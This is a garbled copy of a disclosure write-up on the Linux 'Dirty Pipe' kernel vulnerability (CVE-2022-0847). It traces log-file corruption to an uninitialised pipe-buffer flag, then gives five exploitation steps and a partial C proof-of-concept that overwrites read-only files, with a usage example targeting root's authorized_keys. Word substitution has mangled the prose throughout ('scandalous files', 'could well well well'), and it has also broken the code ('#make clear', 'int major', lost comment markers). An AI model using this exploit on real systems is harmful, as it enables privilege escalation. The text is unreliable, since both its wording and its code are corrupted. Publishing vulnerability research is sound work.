Max Kellermann>


This is the memoir of CVE-2022-0847, a vulnerability within the Linux
kernel since 5.8 which permits overwriting files in arbitrary read-only
files. This ends in privilege escalation attributable to unprivileged
processes can inject code into root processes.

It is comparable to CVE-2016-5195 “Dirty Cow” however is much less complex to employ.

The vulnerability became fixed
in Linux 5.16.11, 5.15.25 and 5.10.102.

Corruption pt. I

All of it started a One year ago with a enhance designate about scandalous files.
A customer complained that the entry logs they downloaded could well well well now not
be decompressed. And indeed, there became a scandalous log file on one of
the log servers; it’s going to be decompressed, however gzip reported a CRC
error. I could well well well now not present why it became scandalous, however I believed the
nightly split route of had crashed and left a scandalous file on the back of. I
fixed the file’s CRC manually, closed the designate, and soon forgot
in regards to the challenge.

Months later, this came about all over again and all over all over again. On every occasion, the
file’s contents seemed appropriate, only the CRC on the pause of the file
became unhealthy. Now, with several scandalous files, I became in a position to dig deeper
and stumbled on a surprising kind of corruption. A sample emerged.

Get entry to Logging

Let me temporarily introduce how our log server works: Within the CM4all
internet hosting environment, all internet servers (operating our personalized originate offer
HTTP server
) ship UDP
multicast datagrams with metadata about every HTTP ask. These are
got by the log servers operating Pond, our personalized originate offer in-memory
database. A nightly job splits all entry logs of the day prior to this
into one per hosted internet characteristic, every compressed with zlib.

By HTTP, all entry logs of a month could well well well be downloaded as a single
.gz file. Utilizing a trick (which entails Z_SYNC_FLUSH), we are able to
factual concatenate all gzipped day-to-day log files with out a must
decompress and recompress them, which formula this HTTP ask consumes
as regards to no CPU. Memory bandwidth is saved by utilizing the
splice() machine call to feed files straight from the laborious disk into
the HTTP connection, without passing the kernel/userspace boundary

Dwelling windows customers can’t take care of .gz files, however all people can extract
ZIP files. A ZIP file is factual a container for .gz files, so we
could well well well employ the the same formula to generate ZIP files on-the-wing; all we
wished to discontinuance became ship a ZIP header first, then concatenate all .gz
file contents as weird and wonderful, adopted by the central itemizing (yet every other
kind of header).

Corruption pt. II

This is how a the pause of a honest day-to-day file looks:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 9c 12 0b f5 f7 4a  00 00

The 00 00 ff ff is the sync flush which permits
easy concatenation. 03 00 is an empty “final” block, and is
adopted by a CRC32 (0xf50b129c) and the uncompressed file size
(0x00004af7=19191 bytes).

The identical file however corrupted:

000005f0  81 d6 94 39 8a 05 b0 ed  e9 c0 fd 07 00 00 ff ff
00000600  03 00 50 4b 01 02 1e 03  14 00

The sync flush is there, the empty final block is there, however the
uncompressed size is now 0x0014031e=1.3 MB (that’s unhealthy, it’s
the the same 19 kB file as above). The CRC32 is 0x02014b50, which
does now now not match the file contents. Why? Is this an out-of-bounds
write or a heap corruption bug in our log shopper?

I compared all identified-scandalous files and stumbled on, to my shock,
that every of them had the the same CRC32 and the the same “file size” impress.
Continuously the the same CRC – this implies that this is able to maybe well now now not be the implications of a
CRC calculation. With scandalous files, we would explore a spread of (however
unhealthy) CRC values. For hours, I stared holes into the code however could well well well
now now not secure an clarification.

Then I stared at these 8 bytes. At closing, I realized that 50 4b
is ASCII for “P” and “Ok”. “PK”, that’s how all ZIP headers originate.
Let’s agree with a explore at these 8 bytes all over again:

  • 50 4b is “PK”

  • 01 02 is the code for central itemizing file header.

  • “Model made by”=1e 03; 0x1e=30 (3.0); 0x03=UNIX

  • “Model wished to extract”=14 00; 0x0014=20 (2.0)

The leisure is missing; the header became it appears to be like truncated after 8

This is admittedly the starting up of a ZIP central itemizing file header,
this is able to maybe well now now not be a twist of destiny. Nonetheless the route of which writes these
files has no code to generate such header. In my desperation, I seemed
on the zlib offer code and all a spread of libraries weird and wonderful by that route of
however stumbled on nothing. This share of software program doesn’t know one thing about
“PK” headers.

There is one route of which generates “PK” headers, despite the indisputable truth that; it’s the
internet provider which constructs ZIP files on-the-wing. Nonetheless this route of
runs as a selected user which doesn’t agree with write permissions on these
files. It must now now not per chance be that route of.

None of this made sense, however original enhance tickets kept coming in (at a
very unhurried rate). There became some systematic challenge, however I factual
couldn’t bring collectively a grip on it. That gave me a spread of frustration, however
I became busy with a spread of projects, and I kept pushing this file corruption
challenge to the back of my queue.

Corruption pt. III

Exterior power brought this challenge back into my consciousness. I
scanned the entire laborious disk for scandalous files (which took two days),
hoping for more patterns to emerge. And indeed, there became a sample:

  • there were 37 scandalous files all around the past 3 months

  • they occurred on 22 weird and wonderful days

  • 18 of those days agree with 1 corruption

  • 1 day has 2 corruptions (2021-11-21)

  • 1 day has 7 corruptions (2021-11-30)

  • 1 day has 6 corruptions (2021-12-31)

  • 1 day has 4 corruptions (2022-01-31)

The closing day of every month is clearly the one which most corruptions

Fully the major log server had corruptions (the one which served HTTP
connections and constructed ZIP files). The standby server (HTTP
inactive however identical log extraction route of) had zero corruptions. Info
on both servers became the same, minus those corruptions.

Is this triggered by flaky hardware? Unsuitable RAM? Unsuitable storage? Cosmic
rays? No, the symptoms don’t stumble on esteem a hardware area. A ghost in
the machine? Attain we need an exorcist?

Man searching at code

I started staring holes into my code all over again, this time the fetch provider.

Take present of, the fetch provider writes a ZIP header, then uses splice()
to ship all compressed files, and at closing uses write() all over again for
the “central itemizing file header”, which begins with 50 4b 01 02
1e 03 14 00
, exactly the corruption. The suggestions despatched over the wire
looks exactly esteem the scandalous files on disk. Nonetheless the route of sending
this on the wire has no write permissions on those files (and doesn’t
even strive to discontinuance so), it only reads them. Towards all odds and towards
the impossible, it need to be that route of which causes corruptions,
however how?

My first flash of inspiration why it’s continually the closing day of the
month which gets corrupted. When a area owner downloads the entry
log, the server starts with the first day of the month, then the
2d day, and many others. In truth, the closing day of the month is
despatched on the pause; the closing day of the month is continually adopted by the
“PK” header. That’s why it’s more in all probability to scandalous the closing day.
(The a spread of days could well well well be corrupted if the requested month is now now not yet
over, however that’s much less in all probability.)


Man searching at kernel code

After being caught for more hours, after disposing of everything that
became no doubt impossible (personally), I drew a conclusion: this
must be a kernel bug.

Blaming the Linux kernel (i.e. someone else’s code) for files
corruption must be the closing resort. That is unlikely. The kernel is
an especially complex mission developed by hundreds of people
with systems that will maybe well seem chaotic; despite of this, it’s very
genuine and obliging. Nonetheless this time, I became convinced that it must be a
kernel bug.

In a moment of unparalleled readability, I hacked two C packages.

Particular person that keeps writing odd chunks of the string “AAAAA” to a file
(simulating the log splitter):

int major(int argc, char argv) {
  for (;;) write(1, "AAAAA", 5);
// ./creator>foo

And one which keeps transferring files from that file to a pipe utilizing
splice() after which writes the string “BBBBB” to the pipe
(simulating the ZIP generator):

#make clear _GNU_SOURCE
int major(int argc, char argv) {
  for (;;) {
    splice(0, 0, 1, 0, 2, 0);
    write(1, "BBBBB", 5);
// ./splicer /dev/null

I copied those two packages to the log server, and… bingo! The
string “BBBBB” started showing within the file, even if no one ever
wrote this string to the file (only to the pipe by a route of without
write permissions).

So this in actual fact is a kernel bug!

All bugs change into shallow when they are normally reproduced. A immediate check
verified that this bug impacts Linux 5.10 (Debian Bullseye) however now now not
Linux 4.19 (Debian Buster). There are 185.011 git commits between
v4.19 and v5.10, however thanks to git bisect, it takes factual 17 steps
to stumble on the contaminated commit.

The bisect arrived at commit f6dd975583bd,
which refactors the pipe buffer code for nameless pipe buffers. It
changes the trend how the “mergeable” check is done for pipes.

Pipes and Buffers and Pages

Why pipes, anyway? In our setup, the fetch provider which generates ZIP
files communicates with the fetch server over pipes; it talks the Internet
Utility Socket
which we invented attributable to we were now now not delighted with CGI, FastCGI and AJP.
Utilizing pipes reasonably than multiplexing over a socket (esteem FastCGI and
AJP discontinuance) has a major advantage: that it’s in all probability you’ll additionally employ splice() in both the
utility and the fetch server for maximum efficiency. This reduces
the overhead for having internet functions out-of-route of (as hostile
to operating internet products and providers interior the fetch server route of, esteem Apache
modules discontinuance). This allows privilege separation without sacrificing
(great) performance.

Immediate detour on Linux memory management:
The smallest unit of memory managed by the CPU is a page (in general
4 kB). All the pieces within the lowest layer of Linux’s memory management is
about pages. If an utility requests memory from the kernel, it
will bring collectively a assortment of (nameless) pages. All file I/O is also about
pages: within the event you read files from a file, the kernel first copies a bunch
of 4 kB chunks from the laborious disk into kernel memory, managed by a
subsystem known as the page cache. From there, the knowledge will be
copied to userspace. The reproduction within the page cache stays for some
time, the place it must be weird and wonderful all over again, warding off pointless laborious disk I/O,
till the kernel decides it has a more in-depth employ for that memory
(“reclaim”). As yet every other of copying file files to userspace memory, pages
managed by the page cache could well well well be mapped straight into userspace utilizing
the mmap() machine call (a commerce-off for diminished memory bandwidth
on the cost of elevated page faults and TLB flushes). The Linux
kernel has more tricks: the sendfile() machine call permits an
utility to ship file contents accurate into a socket without a roundtrip to
userspace (an optimization celebrated in internet servers serving static files
over HTTP). The splice() machine call is quite a generalization
of sendfile(): It permits the the same optimization if either aspect of
the switch is a pipe; the a spread of aspect could well well well be nearly one thing
(yet every other pipe, a file, a socket, a block software program, a persona software program).
The kernel implements this by passing page references spherical, now now not
in actual fact copying one thing (zero-reproduction).

A pipe is a software program for unidirectional inter-route of communication.
One pause is for pushing files into it, the a spread of pause can pull that files.
The Linux kernel implements this by a hoop
of struct pipe_buffer,
every relating to a page. The major write to a pipe allocates a
page (place for 4 kB price of files). If essentially the most existing write does
now now not own the page fully, a following write could well well well append to that
existing page reasonably than allocating a brand original one. This is how
“nameless” pipe buffers work (anon_pipe_buf_ops).

Within the event you, however, splice() files from a file into the pipe, the
kernel will first load the knowledge into the page cache. Then this will
save a struct pipe_buffer pointing interior the page cache
(zero-reproduction), however now not like nameless pipe buffers, extra files
written to the pipe need to now now not be appended to such a page attributable to the
page is owned by the page cache, now now not by the pipe.

Historical past of the check for whether original files could well well well be appended to an
existing pipe buffer:

Over the years, this check became refactored to and fro, which became
k. Or became it?


Numerous years earlier than PIPE_BUF_FLAG_CAN_MERGE became born, commit
241699cd72a8 “original iov_iter flavour: pipe-backed” (Linux 4.9, 2016)

added two original functions which allocate a brand original struct pipe_buffer,
however initialization of its flags member became missing. It became now
in all probability to save page cache references with arbitrary flags, however
that did now now not subject. It became technically a bug, despite the indisputable truth that without
penalties within the interim attributable to all of the present flags were
reasonably boring.

This bug became serious in Linux 5.8 with commit
f6dd975583bd “pipe: merge anon_pipe_buf*_ops”
By injecting PIPE_BUF_FLAG_CAN_MERGE accurate into a page cache reference,
it became in all probability to overwrite files within the page cache, merely by
writing original files into the pipe ready in a a spread of formula.

Corruption pt. IV

This explains the file corruption: First, some files gets written into
the pipe, then a entire bunch files bring collectively spliced, developing page cache
references. Randomly, those could well well well or could well well well now not agree with
PIPE_BUF_FLAG_CAN_MERGE place. If scurry, then the write() call
that writes the central itemizing file header will be written to the
page cache of the closing compressed file.

Nonetheless why only the first 8 bytes of that header? No doubt, all of the
header gets copied to the page cache, however this operation does now now not
expand the file size. The normal file had only 8 bytes of
“unspliced” place on the pause, and only those bytes could well well well be overwritten.
The the leisure of the page is unused from the page cache’s level of view
(despite the indisputable truth that the pipe buffer code does employ it attributable to it has its maintain page
own management).

And why does this now now not occur more in general? Since the page cache does
now now not write back to disk unless it believes the page is “dirty”.
Accidently overwriting files within the page cache is now now not going to assemble the page
“dirty”. If no a spread of route of occurs to “dirty” the file, this alternate
will be ephemeral; after the next reboot (or after the kernel decides
to tumble the page from the cache, e.g. reclaim under memory power),
the alternate is reverted. This allows attention-grabbing attacks without
leaving a slightly on laborious disk.


In my first exploit (the “creator” / “splicer” packages which I weird and wonderful
for the bisect), I had assumed that this bug is barely exploitable whereas
a privileged route of writes the file, and that it’s a ways reckoning on timing.

After I realized what the actual challenge became, I became in a position to widen the
gap by a colossal margin: it’s in all probability to overwrite the page cache
even within the absence of writers, with out a timing constraints, at
(nearly) arbitrary positions with arbitrary files. The barriers

  • the attacker need to agree with read permissions (attributable to it wishes to
    splice() a page accurate into a pipe)

  • the offset need to now now not be on a page boundary (attributable to no now now not as a lot as one byte
    of that page need to agree with been spliced into the pipe)

  • the write can now now not unpleasant a page boundary (attributable to a brand original nameless
    buffer could well well well be created for the the leisure)

  • the file can now now not be resized (attributable to the pipe has its maintain page own
    management and does now now not expose the page cache how great files has been

To employ this vulnerability, it’s essential:

  1. Get a pipe.

  2. Hold the pipe with arbitrary files (to position the
    PIPE_BUF_FLAG_CAN_MERGE flag in all ring entries).

  3. Drain the pipe (leaving the flag place in all struct pipe_buffer
    conditions on the struct pipe_inode_info ring).

  4. Splice files from the purpose file (opened with O_RDONLY) into
    the pipe from factual earlier than the purpose offset.

  5. Write arbitrary files into the pipe; this files will overwrite the
    cached file page reasonably than developing a brand original anomyous struct
    attributable to PIPE_BUF_FLAG_CAN_MERGE is made up our minds.

To assemble this vulnerability more attention-grabbing, it now now not only works without
write permissions, it also works with immutable files, on read-only
btrfs snapshots and on read-only mounts (including CD-ROM mounts).
That is attributable to the page cache is continually writable (by the kernel), and
writing to a pipe by no formula tests any permissions.

This is my proof-of-belief exploit:

/SPDX-License-Identifier: GPL-2.0 */
 Copyright 2022 CM4all GmbH / IONOS SE
 creator: Max Kellermann 
 Proof-of-belief exploit for the Dirty Pipe
 vulnerability (CVE-2022-0847) triggered by an uninitialized
 "pipe_buffer.flags" variable.  It demonstrates be taught the technique to overwrite any
 file contents within the page cache, even if the file is now now not well-liked
 to be written, immutable or on a read-only mount.
 This exploit requires Linux 5.8 or later; the code path became made
 reachable by commit f6dd975583bd ("pipe: merge
 anon_pipe_buf*_ops").  The commit didn't introduce the bug, it became
 there earlier than, it factual equipped a straightforward formula to employ it.
 There are two major barriers of this exploit: the offset can now now not
 be on a page boundary (it wishes to write down one byte earlier than the offset
 to add a reference to this page to the pipe), and the write can now now not
 unpleasant a page boundary.
 Instance: ./write_anything /root/.ssh/authorized_keys 1 $'nssh-ed25519 AAA......n'
 Extra clarification:

#make clear _GNU_SOURCE

#ifndef PAGE_SIZE
#make clear PAGE_SIZE 4096

 Get a pipe the place all "bufs" on the pipe_inode_info ring agree with the
static void prepare_pipe(int p[2])
	if (pipe(p)) abort();

	const unsigned pipe_size = fcntl(p[1], F_GETPIPE_SZ);
	static char buffer[4096];

	/own the pipe fully; every pipe_buffer will now agree with
	   the PIPE_BUF_FLAG_CAN_MERGE flag */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) :  r;
		write(p[1], buffer, n);
		r -= n;

	/drain the pipe, freeing all pipe_buffer conditions (however
	   leaving the flags initialized) */
	for (unsigned r = pipe_size; r > 0;) {
		unsigned n = r > sizeof(buffer) ? sizeof(buffer) :  r;
		read(p[0], buffer, n);
		r -= n;

	/the pipe is now empty, and if someone adds a brand original
	   pipe_buffer without initializing its "flags", the buffer
	   will be mergeable */

int major(int argc, char argv)
	if (argc != 4) {
		fprintf(stderr, "Usage: %s TARGETFILE OFFSET DATAn", argv[0]);
		return EXIT_FAILURE;

	/uninteresting whine-line argument parser */
	const char *const path = argv[1];
	loff_t offset = strtoul(argv[2], NULL, 0);
	const char *const files = argv[3];
	const size_t data_size = strlen(files);

	if (offset % PAGE_SIZE == 0) {
		fprintf(stderr, "Sorry, can now now not originate writing at a page boundaryn");
		return EXIT_FAILURE;

	const loff_t next_page = (offset | (PAGE_SIZE - 1)) + 1;
	const loff_t end_offset = offset + (loff_t)data_size;
	if (end_offset > next_page) {
		fprintf(stderr, "Sorry, can now now not write all over a page boundaryn");
		return EXIT_FAILURE;

	/originate the enter file and validate the required offset */
	const int fd = originate(path, O_RDONLY); // scurry, read-only! :-)
	if (fd  0) {
		perror("open failed");
		return EXIT_FAILURE;

	struct stat st;
	if (fstat(fd, &st)) {
		perror("stat failed");
		return EXIT_FAILURE;

	if (offset > st.st_size) {
		fprintf(stderr, "Offset is now now not interior the filen");
		return EXIT_FAILURE;

	if (end_offset > st.st_size) {
		fprintf(stderr, "Sorry, can now now not lengthen the filen");
		return EXIT_FAILURE;

	/save the pipe with all flags initialized with
	int p[2];

	/splice one byte from earlier than the required offset into the
	   pipe; this will add a reference to the page cache, however
	   since copy_page_to_iter_pipe() does now now not initialize the
	   "flags", PIPE_BUF_FLAG